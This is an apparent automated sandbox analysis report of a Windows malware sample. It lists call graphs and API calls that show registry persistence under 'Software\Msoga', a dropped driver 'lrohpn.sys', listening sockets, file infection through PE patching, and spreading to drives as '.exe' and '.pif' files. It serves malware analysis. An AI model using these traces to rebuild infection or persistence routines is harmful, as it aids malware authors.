7892->7899 8619 8fa75a GetTempPathA lstrlen 7892->8619 8629 900945 lstrcpy 7892->8629 7895->7891 8646 8f45d2 DeleteFileA CreateFileA 7895->8646 8649 8f4631 lstrcpy lstrlen 7895->8649 7898 8f8b86 Sleep 7898->7892 7899->7892 8652 9014d9 CreateFileA 7899->8652 7902 90393a 7901->7902 7903 903971 Sleep 7902->7903 7904 90397e lstrcpy LoadLibraryA 7902->7904 7903->7902 7905 9039b7 GetProcAddress 7904->7905 7906 9039cf 7904->7906 7905->7906 7907 9039d8 FreeLibrary lstrcat LoadLibraryA 7906->7907 7908 903a2c 7906->7908 7907->7908 7909 903a14 GetProcAddress 7907->7909 8697 90377a 7908->8697 7909->7908 7911 903a31 CreateThread 7912 8f41c6 3 API calls 7911->7912 8836 903062 7911->8836 7913 903a55 CreateThread 7912->7913 7914 8f41c6 3 API calls 7913->7914 8829 901e9b Sleep 7913->8829 7915 903a7c Sleep 7914->7915 7916 903ab0 7915->7916 7917 903ae7 Sleep 7916->7917 7918 903ab9 CreateThread 7916->7918 7922 903a96 Sleep 7916->7922 8708 90174a Sleep wsprintfA RegOpenKeyExA 7917->8708 7919 8f41c6 3 API calls 7918->7919 8822 901ce3 7918->8822 7919->7916 7922->7916 7923 90174a 56 API calls 7925 903b09 7923->7925 7924 903b0e Sleep 7924->7925 7925->7924 8718 90195d Sleep WNetOpenEnumA 7925->8718 7928 8f9ef9 Sleep 7927->7928 7929 8f9f06 Sleep 7927->7929 7930 8f9f11 7928->7930 7929->7930 8958 8f8f51 RegOpenKeyExA 7930->8958 7933 8f8f51 7 API calls 7934 8f9f43 LoadLibraryA 7933->7934 7935 8fa149 RtlExitUserThread 7934->7935 7936 8f9f60 GetProcAddress 7934->7936 7937 8fa165 7935->7937 7938 8f9f7e 7936->7938 7939 8f9f83 GetProcAddress 7936->7939 7940 8f9fa7 GetProcAddress 7939->7940 7941 8f9fa2 7939->7941 7942 8f9fcb GetProcAddress 7940->7942 7943 8f9fc6 7940->7943 7944 8f9fee GetProcAddress 7942->7944 7945 8f9fe9 7942->7945 7946 8fa00d 7944->7946 7947 8fa012 GetProcAddress 7944->7947 7948 8fa036 GetProcAddress 7947->7948 7949 8fa031 7947->7949 7950 8fa059 GetProcAddress 7948->7950 7951 8fa054 7948->7951 7952 8fa07d 7950->7952 7953 8fa078 7950->7953 8969 8f92f3 GetSystemDirectoryA lstrlen 
7952->8969 7953->7935 7955 8fa082 CreateThread 7956 8f41c6 3 API calls 7955->7956 9003 8f940a 7955->9003 7957 8fa0a3 LoadLibraryA 7956->7957 7957->7935 7958 8fa0c0 GetProcAddress 7957->7958 7958->7935 7959 8fa0de 7958->7959 8973 8f917d CreateFileA 7959->8973 7961 8fa0e3 7962 8fa110 7961->7962 7963 8f45d2 4 API calls 7961->7963 7964 8f917d 2 API calls 7962->7964 7965 8fa0fd 7963->7965 7966 8fa118 7964->7966 8976 8f9243 7965->8976 7966->7935 8979 8f9706 GetSystemDirectoryA lstrlen 7966->8979 7970 8fa125 CreateThread 7971 8f41c6 3 API calls 7970->7971 8998 8f9ebe 7970->8998 7971->7953 7973 8fc89a 2 API calls 7972->7973 7974 902828 7973->7974 7975 902845 GlobalFree 7974->7975 7976 902885 RtlExitUserThread 7975->7976 7978 902863 7975->7978 7978->7976 9042 902514 CreateToolhelp32Snapshot 7978->9042 7980 90291f Sleep 7980->7978 7986 8f87d7 7981->7986 7982 8f88e2 RtlExitUserThread 7983 8f889a Sleep 7983->7986 7984 8f88b8 Sleep 7988 8f5760 10 API calls 7984->7988 7985 8f883d 7985->7984 7985->7986 7986->7982 7986->7983 7986->7984 7986->7985 7987 8f883f CreateThread 7986->7987 7993 8f887f Sleep 7986->7993 7989 8f41c6 3 API calls 7987->7989 9103 8f84c1 7987->9103 7990 8f88ca 7988->7990 7991 8f8868 Sleep 7989->7991 7992 8f88d2 Sleep 7990->7992 7991->7986 7992->7986 7993->7986 7995 8f83fe htons bind 7994->7995 7997 8f83f9 7994->7997 7996 8f8438 listen 7995->7996 7995->7997 7996->7997 8001 8f844d 7996->8001 7999 8f849f closesocket 7997->7999 8000 8f84a9 RtlExitUserThread 7997->8000 7998 8f8456 accept 7998->8001 7999->8000 8002 8f84bb 8000->8002 8001->7997 8001->7998 8003 8f8473 CreateThread 8001->8003 8004 8f41c6 3 API calls 8003->8004 9220 8f828e 8003->9220 8005 8f8494 8004->8005 8005->8001 8007 908060 8006->8007 8008 8f7a47 htons socket 8007->8008 8009 8f7b20 setsockopt bind 8008->8009 8010 8f7b1b 8008->8010 8009->8010 8018 8f7b69 8009->8018 8014 8f7c2a closesocket 8010->8014 8015 8f7c37 RtlExitUserThread 8010->8015 8011 8f7b76 GlobalAlloc recvfrom 8012 8f7c0f GlobalFree 
8011->8012 8013 8f7be6 CreateThread 8011->8013 8012->8018 8017 8f41c6 3 API calls 8013->8017 9223 8f777d 8013->9223 8014->8015 8016 8f7c47 8015->8016 8019 8f7c0a 8017->8019 8018->8010 8018->8011 8019->8018 8020->7865 8022 8fa28f SetFileAttributesA DeleteFileA 8021->8022 8023 8fa277 8021->8023 8025 8fa28d 8022->8025 8028 8fe329 8023->8028 8025->7879 8027->7879 8029 8fe353 8028->8029 8138 8f44cb InterlockedExchange 8029->8138 8031 8fe456 8139 8f44cb InterlockedExchange 8031->8139 8033 8fe714 8034 8fe71d MultiByteToWideChar 8033->8034 8035 8fe753 RtlEnterCriticalSection 8033->8035 8036 8fe748 8034->8036 8040 8fe778 8035->8040 8036->8035 8048 8fa284 8036->8048 8037 8fe6fd 8039 8fa26e 6 API calls 8037->8039 8038 8fe499 8038->8033 8038->8037 8038->8048 8039->8048 8041 8fe7b6 GetLocalTime GetFileAttributesA SetFileAttributesA 8040->8041 8042 8fe7f2 CreateFileA 8041->8042 8052 8fe7e6 8041->8052 8043 8fe81d GetFileSize 8042->8043 8044 8fe832 8042->8044 8043->8044 8047 90088b CloseHandle SetFileAttributesA 8044->8047 8053 8fe85f GetFileTime CreateFileMappingA 8044->8053 8045 9008de GlobalFree 8046 9008ef RtlLeaveCriticalSection 8045->8046 8046->8048 8049 90090a Sleep 8046->8049 8050 9008b5 DeleteFileA 8047->8050 8051 9008af 8047->8051 8048->8022 8048->8025 8049->8048 8050->8052 8051->8050 8051->8052 8052->8045 8052->8046 8054 8fe8c2 MapViewOfFile 8053->8054 8059 8feb53 8053->8059 8054->8059 8067 8fe8e4 8054->8067 8055 9007db CloseHandle 8055->8047 8056 9007f5 SetFilePointer SetEndOfFile 8055->8056 8057 900852 8056->8057 8058 90082b 8056->8058 8061 900858 GlobalFree 8057->8061 8062 900869 SetFileTime 8057->8062 8058->8057 8060 900831 WriteFile 8058->8060 8059->8055 8063 9007d1 UnmapViewOfFile 8059->8063 8064 900793 GlobalAlloc 8059->8064 8066 9005ed 8059->8066 8060->8057 8061->8062 8062->8047 8063->8055 8064->8066 8065 90077f 8065->8063 8066->8065 8067->8059 8071 8fe9ba 8067->8071 8286 8f44cb InterlockedExchange 8067->8286 8069 8fe997 8069->8071 8287 8f44cb 
InterlockedExchange 8069->8287 8071->8059 8072 8fed26 lstrcpyn lstrcmpiA 8071->8072 8074 8fed5c 8072->8074 8073 8fee9a GlobalAlloc 8075 8feecc 8073->8075 8074->8059 8074->8073 8076 8feecf 8074->8076 8075->8076 8140 8f44cb InterlockedExchange 8076->8140 8078 8ff319 8079 8ff925 8078->8079 8288 8fcd03 8078->8288 8081 8ff9a1 8079->8081 8084 8fcd03 2 API calls 8079->8084 8083 8ff9f8 8081->8083 8085 8fcd03 2 API calls 8081->8085 8082 8ff306 IsBadWritePtr 8082->8078 8092 8fef48 8082->8092 8141 8f44cb InterlockedExchange 8083->8141 8084->8081 8085->8083 8087 8ffa0e 8088 8ffa55 8087->8088 8340 8f44cb InterlockedExchange 8087->8340 8142 8f44cb InterlockedExchange 8088->8142 8091 8ffa82 8093 8fcd03 2 API calls 8091->8093 8094 8ffad5 8091->8094 8092->8059 8092->8078 8092->8082 8097 8ff39d 8092->8097 8093->8094 8095 8fcd03 2 API calls 8094->8095 8096 8ffb50 8094->8096 8095->8096 8102 8ffb9e 8096->8102 8341 8fc76b 8096->8341 8099 8ff4ce IsBadWritePtr 8097->8099 8104 8ff4e1 8099->8104 8100 8ffc7e 8143 8f44cb InterlockedExchange 8100->8143 8102->8100 8103 8fcd03 2 API calls 8102->8103 8103->8100 8107 8ff579 IsBadWritePtr 8104->8107 8105 8ffc94 8106 8ffd1f 8105->8106 8108 8ffd5c 8105->8108 8112 8fcd03 2 API calls 8105->8112 8355 8fb3ef 8106->8355 8115 8ff58c 8107->8115 8108->8059 8144 8fd34d 8108->8144 8110 8ff5e4 IsBadWritePtr 8110->8078 8113 8ff5fc IsBadWritePtr 8110->8113 8112->8106 8113->8078 8126 8ff614 8113->8126 8115->8110 8116 8ff634 IsBadWritePtr 8116->8078 8118 8ff64c IsBadWritePtr 8116->8118 8117 8fc89a 2 API calls 8128 8ffe88 8117->8128 8118->8078 8118->8126 8119 8ff705 IsBadWritePtr 8119->8078 8119->8126 8120 8ff742 IsBadWritePtr 8120->8078 8120->8126 8121 8ff76e lstrcmpiA 8122 8ff7cd lstrcmpiA 8121->8122 8121->8126 8123 8ff802 lstrcmpiA 8122->8123 8122->8126 8124 8ff834 lstrcmpiA 8123->8124 8123->8126 8125 8ff875 lstrcmpiA 8124->8125 8124->8126 8125->8126 8126->8078 8126->8116 8126->8119 8126->8120 8126->8121 8126->8122 8126->8123 8126->8124 8126->8125 8128->8059 8381 
8f6981 8128->8381 8129 9003c7 8130 9004a3 8129->8130 8392 8f44cb InterlockedExchange 8130->8392 8132 9004ed GetTickCount 8133 9005c8 8132->8133 8134 90051a 8132->8134 8133->8059 8393 8f44cb InterlockedExchange 8134->8393 8136 90051f 8136->8133 8394 8f44cb InterlockedExchange 8136->8394 8138->8031 8139->8038 8140->8092 8141->8087 8142->8091 8143->8105 8145 8fd3b6 8144->8145 8149 8fd3e7 8145->8149 8428 8f44cb InterlockedExchange 8145->8428 8147 8fd45c 8395 8f44cb InterlockedExchange 8147->8395 8149->8147 8151 8fcd03 2 API calls 8149->8151 8150 8fd47b 8152 8fd4aa 8150->8152 8429 8f44cb InterlockedExchange 8150->8429 8151->8149 8154 8fc76b 2 API calls 8152->8154 8155 8fd4e3 8154->8155 8156 8fc76b 2 API calls 8155->8156 8157 8fd50b 8156->8157 8396 8f44cb InterlockedExchange 8157->8396 8159 8fd535 8160 8fd564 8159->8160 8430 8f44cb InterlockedExchange 8159->8430 8162 8fc76b 2 API calls 8160->8162 8163 8fd58b 8162->8163 8164 8fc76b 2 API calls 8163->8164 8165 8fd5c8 8164->8165 8166 8fb3ef InterlockedExchange 8165->8166 8167 8fd603 8166->8167 8397 8f44cb InterlockedExchange 8167->8397 8169 8fd613 8398 8fb354 8169->8398 8173 8fd659 8174 8fd688 8173->8174 8431 8f44cb InterlockedExchange 8173->8431 8176 8fc76b 2 API calls 8174->8176 8177 8fd6b9 8176->8177 8408 8f44cb InterlockedExchange 8177->8408 8179 8fd6cf 8180 8fd706 8179->8180 8432 8f44cb InterlockedExchange 8179->8432 8182 8fc76b 2 API calls 8180->8182 8183 8fd749 8182->8183 8184 8fb3ef InterlockedExchange 8183->8184 8185 8fd7b6 8184->8185 8409 8fd1b9 8185->8409 8187 8fd7dc 8188 8fb3ef InterlockedExchange 8187->8188 8189 8fd7fc 8188->8189 8190 8fc76b 2 API calls 8189->8190 8191 8fd824 8190->8191 8192 8fb3ef InterlockedExchange 8191->8192 8193 8fd87f 8192->8193 8422 8f44cb InterlockedExchange 8193->8422 8195 8fd8a9 8197 8fd8e8 8195->8197 8433 8f44cb InterlockedExchange 8195->8433 8198 8fc76b 2 API calls 8197->8198 8199 8fd925 8198->8199 8423 8f44cb InterlockedExchange 8199->8423 8202 8fd935 8203 8fd974 8202->8203 8434 
8f44cb InterlockedExchange 8202->8434 8204 8fc76b 2 API calls 8203->8204 8205 8fd9b7 8204->8205 8206 8fb3ef InterlockedExchange 8205->8206 8207 8fd9d7 8206->8207 8208 8fb3ef InterlockedExchange 8207->8208 8209 8fda11 8208->8209 8210 8fd1b9 2 API calls 8209->8210 8211 8fda37 8210->8211 8212 8fb3ef InterlockedExchange 8211->8212 8213 8fda57 8212->8213 8214 8fd1b9 2 API calls 8213->8214 8215 8fda7d 8214->8215 8216 8fb3ef InterlockedExchange 8215->8216 8217 8fdac3 8216->8217 8218 8fc76b 2 API calls 8217->8218 8219 8fdaeb 8218->8219 8424 8f44cb InterlockedExchange 8219->8424 8221 8fdafb 8223 8fdb3a 8221->8223 8435 8f44cb InterlockedExchange 8221->8435 8224 8fc76b 2 API calls 8223->8224 8225 8fdb92 8224->8225 8226 8fc76b 2 API calls 8225->8226 8227 8fdc05 8226->8227 8228 8fc76b 2 API calls 8227->8228 8229 8fdc2d 8228->8229 8425 8f44cb InterlockedExchange 8229->8425 8231 8fdc3d 8233 8fdc7c 8231->8233 8436 8f44cb InterlockedExchange 8231->8436 8234 8fc76b 2 API calls 8233->8234 8235 8fdcc9 8234->8235 8236 8fb3ef InterlockedExchange 8235->8236 8237 8fdd36 8236->8237 8238 8fd1b9 2 API calls 8237->8238 8239 8fdd5c 8238->8239 8240 8fb3ef InterlockedExchange 8239->8240 8241 8fdd7c 8240->8241 8242 8fb3ef InterlockedExchange 8241->8242 8243 8fddd2 8242->8243 8244 8fb3ef InterlockedExchange 8243->8244 8245 8fde2d 8244->8245 8246 8fc76b 2 API calls 8245->8246 8247 8fde8b 8246->8247 8248 8fc76b 2 API calls 8247->8248 8249 8fdeb3 8248->8249 8426 8f44cb InterlockedExchange 8249->8426 8251 8fdec3 8253 8fdf0a 8251->8253 8437 8f44cb InterlockedExchange 8251->8437 8254 8fc76b 2 API calls 8253->8254 8255 8fdf61 8254->8255 8256 8fb3ef InterlockedExchange 8255->8256 8257 8fdf81 8256->8257 8258 8fb3ef InterlockedExchange 8257->8258 8259 8fdfee 8258->8259 8260 8fd1b9 2 API calls 8259->8260 8261 8fe014 8260->8261 8262 8fb3ef InterlockedExchange 8261->8262 8263 8fe034 8262->8263 8264 8fc76b 2 API calls 8263->8264 8265 8fe05a 8264->8265 8266 8fc76b 2 API calls 8265->8266 8267 8fe082 8266->8267 
8427 8f44cb InterlockedExchange 8267->8427 8270 8fe0cd 8271 8fe114 8270->8271 8438 8f44cb InterlockedExchange 8270->8438 8272 8fc76b 2 API calls 8271->8272 8273 8fe16b 8272->8273 8274 8fc76b 2 API calls 8273->8274 8275 8fe193 8274->8275 8276 8fc76b 2 API calls 8275->8276 8277 8fe1bb 8276->8277 8278 8fc76b 2 API calls 8277->8278 8279 8fe1e1 8278->8279 8280 8fc76b 2 API calls 8279->8280 8281 8fe20a 8280->8281 8282 8fc76b 2 API calls 8281->8282 8283 8fe28f 8282->8283 8284 8fc76b 2 API calls 8283->8284 8285 8fe2c4 8284->8285 8285->8059 8285->8117 8286->8069 8287->8071 8289 8fcd47 8288->8289 8290 8fcd58 8288->8290 8444 8fcb12 8289->8444 8456 8f44cb InterlockedExchange 8290->8456 8293 8fcd68 8294 8fce2c 8293->8294 8457 8fcc78 8293->8457 8296 8fce62 8294->8296 8299 8fcb12 InterlockedExchange 8294->8299 8467 8f44cb InterlockedExchange 8296->8467 8299->8296 8301 8fcdac 8303 8fcdd9 8301->8303 8304 8fcdc2 8301->8304 8302 8fd1a7 8302->8079 8465 8f44cb InterlockedExchange 8303->8465 8464 8f44cb InterlockedExchange 8304->8464 8305 8fce72 8309 8fcc78 InterlockedExchange 8305->8309 8339 8fd060 8305->8339 8306 8fcb12 InterlockedExchange 8306->8302 8311 8fcea5 8309->8311 8310 8fcdc7 8466 8f44cb InterlockedExchange 8310->8466 8311->8339 8468 8f44cb InterlockedExchange 8311->8468 8314 8fce09 8316 8fc76b 2 API calls 8314->8316 8315 8fceca 8469 8f44cb InterlockedExchange 8315->8469 8316->8294 8318 8fceea 8319 8fcf2b 8318->8319 8320 8fcf04 8318->8320 8322 8fc76b 2 API calls 8319->8322 8321 8fb354 2 API calls 8320->8321 8323 8fcf1a 8321->8323 8322->8323 8470 8f44cb InterlockedExchange 8323->8470 8325 8fcf66 8326 8fc76b 2 API calls 8325->8326 8327 8fcf78 8325->8327 8326->8327 8328 8fcfff 8327->8328 8329 8fcfe8 8327->8329 8472 8f44cb InterlockedExchange 8328->8472 8471 8f44cb InterlockedExchange 8329->8471 8332 8fcfed 8333 8fc76b 2 API calls 8332->8333 8334 8fd037 8333->8334 8335 8fd0f1 8334->8335 8336 8fd050 8334->8336 8335->8339 8474 8f44cb InterlockedExchange 8335->8474 8336->8339 8473 

Control-flow Graph
APIs
  • Part of subcall function 00902EBC: RegOpenKeyExA.KERNEL32(80000001,008F244C,00000000,000F003F,?,?), ref: 00902F03
  • Part of subcall function 00902EBC: RegSetValueExA.KERNELBASE(?,008F2488,00000000,00000004,00000002,00000004), ref: 00902F31
  • Part of subcall function 00902EBC: RegCloseKey.KERNEL32(?), ref: 00902F3E
  • Part of subcall function 00902EBC: lstrcpy.KERNEL32(00000000,008F2550), ref: 00902F99
  • Part of subcall function 00902EBC: lstrcat.KERNEL32(00000000,008F2548), ref: 00902FAC
• LoadLibraryA.KERNEL32(008F2154), ref: 00903C13
• GetProcAddress.KERNEL32(00000000,008F278C), ref: 00903C36
• GetProcAddress.KERNEL32(00000000,008F27A0), ref: 00903C4E
• GetProcAddress.KERNEL32(00000000,008F27B0), ref: 00903C67
• LoadLibraryA.KERNEL32(008F2894), ref: 00903C79
• GetProcAddress.KERNEL32(00000000,008F28D8), ref: 00903C9C
• GetProcAddress.KERNEL32(00000000,008F28B0), ref: 00903CB5
• GetProcAddress.KERNEL32(00000000,008F28C4), ref: 00903CCD
• GetProcAddress.KERNEL32(00000000,008F28A0), ref: 00903CE6
• RegOpenKeyExA.KERNEL32(80000001,008F21D4,00000000,000F003F,00000000), ref: 00903D0B
• RegSetValueExA.KERNEL32(00000000,008F21C0,00000000,00000004,00000000,00000004), ref: 00903D3A
• RegCloseKey.KERNEL32(00000000), ref: 00903D47
• RegOpenKeyExA.KERNEL32(80000002,008F22EC,00000000,000F003F,00000000), ref: 00903D67
• RegSetValueExA.KERNEL32(00000000,008F2328,00000000,00000004,00000000,00000004), ref: 00903D96
• RegCloseKey.ADVAPI32(00000000), ref: 00903DA3
• lstrcpy.KERNEL32(00000000,008F2384), ref: 00903DB7
• lstrcat.KERNEL32(00000000,008F242C), ref: 00903DCA
• RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 00903DEA
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 00903E02
• wsprintfA.USER32 ref: 00903E1C
• lstrlen.KERNEL32(?), ref: 00903E2C
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00903E4C
• RegCloseKey.ADVAPI32(?), ref: 00903E59
• RegOpenKeyExA.KERNEL32(80000002,008F2384,00000000,000F003F,00000000), ref: 00903E79
• RegSetValueExA.KERNELBASE(00000000,008F274C,00000000,00000004,00000000,00000004), ref: 00903EAC
• RegSetValueExA.KERNELBASE(00000000,008F275C,00000000,00000004,00000000,00000004), ref: 00903ED7
• RegSetValueExA.KERNEL32(00000000,008F2774,00000000,00000004,00000001,00000004), ref: 00903F02
• RegCloseKey.KERNEL32(00000000), ref: 00903F0F
  • Part of subcall function 00900B9A: lstrcpy.KERNEL32(?,?), ref: 00900BC8
                                                                                                              • Part of subcall function 00900B9A: GetTickCount.KERNEL32 ref: 00900BCE
                                                                                                              • Part of subcall function 00900B9A: lstrlen.KERNEL32(?,008F3D08,00000000), ref: 00900BE1
                                                                                                              • Part of subcall function 00900B9A: wsprintfA.USER32 ref: 00900BEF
                                                                                                              • Part of subcall function 00900B9A: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 00900C0E
                                                                                                              • Part of subcall function 00900B9A: CloseHandle.KERNEL32(?), ref: 00900C2A
                                                                                                              • Part of subcall function 00900B9A: DeleteFileA.KERNEL32(?), ref: 00900C37
                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Windows\,00000104), ref: 00903F1F
                                                                                                            • lstrlen.KERNEL32(C:\Windows\), ref: 00903F2A
                                                                                                            • lstrcat.KERNEL32(C:\Windows\,008F3E20), ref: 00903F46
                                                                                                            • GetComputerNameA.KERNEL32(00000000,00000080), ref: 00903F64
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00903F71
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00903F8F
                                                                                                            • lstrcpy.KERNEL32(Software\Msoga,Software\), ref: 00903FD3
                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000080), ref: 00903FF1
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00903FFE
                                                                                                            • lstrcpy.KERNEL32(00000000,008F2364), ref: 00904017
                                                                                                            • lstrlen.KERNEL32(?), ref: 00904055
                                                                                                            • lstrlen.KERNEL32(Software\Msoga), ref: 009040D0
                                                                                                            • GetTempPathA.KERNEL32(000000E4,C:\Windows\npqqe.log), ref: 009040FC
                                                                                                            • lstrlen.KERNEL32(C:\Windows\npqqe.log), ref: 00904107
                                                                                                            • lstrcat.KERNEL32(C:\Windows\npqqe.log,008F3E30), ref: 00904123
                                                                                                            • lstrcpy.KERNEL32(C:\Windows\npqqe.log,008F2100), ref: 00904145
                                                                                                            • lstrcpy.KERNEL32(C:\Windows\npqqe.log,C:\Windows\), ref: 00904157
                                                                                                            • lstrlen.KERNEL32(?), ref: 0090417F
                                                                                                            • lstrlen.KERNEL32(C:\Windows\npqqe.log), ref: 009041F4
                                                                                                            • lstrcat.KERNEL32(C:\Windows\npqqe.log,008F266C), ref: 00904211
                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,008F2370), ref: 0090422A
                                                                                                            • lstrlen.KERNEL32(44775622570), ref: 00904357
                                                                                                            • GetTickCount.KERNEL32 ref: 009043AA
                                                                                                            • wsprintfA.USER32 ref: 009043BD
                                                                                                            • lstrlen.KERNEL32(?,008F3E34,?), ref: 00904474
                                                                                                            • wsprintfA.USER32 ref: 00904482
                                                                                                            • lstrcat.KERNEL32(?,008F226C), ref: 009044B8
                                                                                                            • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,00000080), ref: 009044C8
                                                                                                            • lstrlen.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys), ref: 009044D3
                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,008F3E38), ref: 009044EF
                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,008F2288), ref: 00904501
                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\lrohpn.sys,?), ref: 00904513
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00020000), ref: 00904520
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00020000), ref: 00904532
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$lstrcat$AddressProcValuelstrcpy$Close$Open$Filewsprintf$Name$AllocCountCreateDirectoryGlobalLibraryLoadTick$ComputerDeleteHandleMappingModulePathSystemTempUserWindows
                                                                                                            • String ID: 44775622570$C:\Windows\npqqe.log$C:\Windows\system32\drivers\lrohpn.sys$Software\$Software\Msoga$joneC:\Windows\$n
                                                                                                            • API String ID: 1097455987-1144511912
                                                                                                            • Opcode ID: f46d28b3af1446b1d01ff4a7b8d73dfa934b7ae52f8af386779d1f5dc5a343be
                                                                                                            • Instruction ID: 39dc5da75d0c5f8e9457a9e6660c5dec058639278f4bf8db0fd851491e1a48b1
                                                                                                            • Opcode Fuzzy Hash: f46d28b3af1446b1d01ff4a7b8d73dfa934b7ae52f8af386779d1f5dc5a343be
                                                                                                            • Instruction Fuzzy Hash: FB42C4B1A41618EFDF14DBA4EC8CBAA77B5FF48705F00429AE309A6291DB745AC0CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlocked
                                                                                                            • String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$PE$_lopen$d$d$d
                                                                                                            • API String ID: 367298776-1942104897
                                                                                                            • Opcode ID: 8d599707097974b53247caa0b6564088869976e7074002b2d8a2460fc9452fdc
                                                                                                            • Instruction ID: e2344f454cd475b3f6027d1ed85cb3e7496464ae74895b2c8a9e727ff08a21eb
                                                                                                            • Opcode Fuzzy Hash: 8d599707097974b53247caa0b6564088869976e7074002b2d8a2460fc9452fdc
                                                                                                            • Instruction Fuzzy Hash: 2A3304B5A01618DFDB24CF54CC84BE9B7B6BF84304F1881E9E20AAB291D7359E85CF54

                                                                                                             Control-flow Graph

                                                                                                             (graph image not reproduced; block summary recovered from the graph data) Function 00903062, blocks 00903062-00903777, thread exits through RtlExitUserThread. Subfunctions called: 00908060, 008F44CB, 00902FFF, 008FE329, 00902EBC, 008FA2AD, 008FA16B, 008F4060, 008F8DEB, 00902B8E. APIs called: Sleep, GetLogicalDrives, GetDriveTypeA, lstrcat, CreateFileA, GetFileTime, FileTimeToSystemTime, CloseHandle, GetFileAttributesA, SetFileAttributesA, DeleteFileA, ReadFile, CharLowerA, lstrlen, GetSystemTime, SystemTimeToFileTime, WriteFile, SetFileTime, lstrcpy. Blocks 00903206-0090373F form a loop: Sleep, GetLogicalDrives, GetDriveTypeA for each drive, lstrcat of a path and CreateFileA on it, file attribute/time handling and WriteFile on the created file, then Sleep again before the next pass.
                                                                                                            APIs
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • Sleep.KERNEL32 ref: 00903176
                                                                                                              • Part of subcall function 00902FFF: CreateFileA.KERNEL32(0090382E,40000000,00000002,00000000,00000004,00000020,00000000,?,0090382E), ref: 0090302B
                                                                                                              • Part of subcall function 00902FFF: WriteFile.KERNEL32(000000FF,008D26B0,00000401,00000000,00000000), ref: 0090304E
                                                                                                              • Part of subcall function 00902FFF: CloseHandle.KERNEL32(000000FF), ref: 00903058
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 009031AC
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 00903210
                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00903220
                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 009032A3
                                                                                                            • lstrcat.KERNEL32(?,008F2740), ref: 009032CA
                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 009032E6
                                                                                                            • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0090331B
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0090332F
                                                                                                            • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 00903391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$SleepTime$Create$CloseDriveDrivesExchangeHandleInterlockedLogicalReadSystemTypeWritelstrcat
                                                                                                            • String ID: .exe$.pif$:$\
                                                                                                            • API String ID: 2892063643-4138429844
